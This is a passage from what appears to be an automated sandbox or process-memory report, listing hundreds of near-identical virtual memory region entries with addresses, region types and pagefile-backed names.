filename = "" Region: id = 11719 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11720 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11721 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11722 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11723 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11724 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11725 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11726 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11727 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11728 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11729 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11730 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11731 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 11732 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11733 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11734 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11770 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11771 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11772 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11773 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11774 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11775 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11776 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11777 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11778 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11779 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11780 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11781 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11782 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11783 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11784 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11785 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11786 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11787 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 11788 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 11789 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 11790 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 11791 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11792 start_va = 0x2a0000 end_va = 
0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11793 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11794 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11795 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11796 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11797 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11798 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11799 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11800 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11801 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11802 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11803 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11804 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11805 
start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11806 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11807 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11808 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11809 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11810 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11811 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11812 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11813 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11814 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11815 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11816 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11817 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 11818 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11819 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11820 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11821 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11822 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11823 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11824 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11825 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11826 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11827 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11828 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11829 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11830 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 11831 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11832 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11833 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11834 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11835 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11836 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11837 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11838 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11839 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11840 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11968 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 11969 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 11970 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 11971 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 11972 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11973 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11974 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11975 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11976 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11977 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11978 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11979 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11980 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11981 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11982 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11983 start_va = 0x2a0000 end_va = 0x2b1fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11984 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11985 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11986 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11987 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11988 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11989 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11990 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11991 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11992 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11993 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11994 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11995 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11996 start_va 
= 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11997 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11998 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11999 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12000 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12001 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12002 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12003 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12004 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12005 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12006 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12007 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12008 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 12009 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12010 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12011 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12012 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12018 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12019 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12020 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12021 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12022 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12023 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12024 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12025 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 12026 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001800000" filename = "" Region: id = 12027 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 12028 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 12029 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12030 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12031 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12032 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12033 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12034 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12035 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12036 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12037 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12038 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12039 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12040 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12041 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12042 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12043 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12044 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12045 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12046 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12047 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12048 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12049 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12050 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12051 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12052 start_va = 0x2a0000 end_va 
= 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12053 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12054 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12055 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12056 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12057 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12058 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12079 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12080 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12081 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12082 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12083 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12084 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
12085 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12086 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12087 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12088 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12089 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12090 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12091 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12092 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12093 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12094 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12095 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12096 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12097 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = 
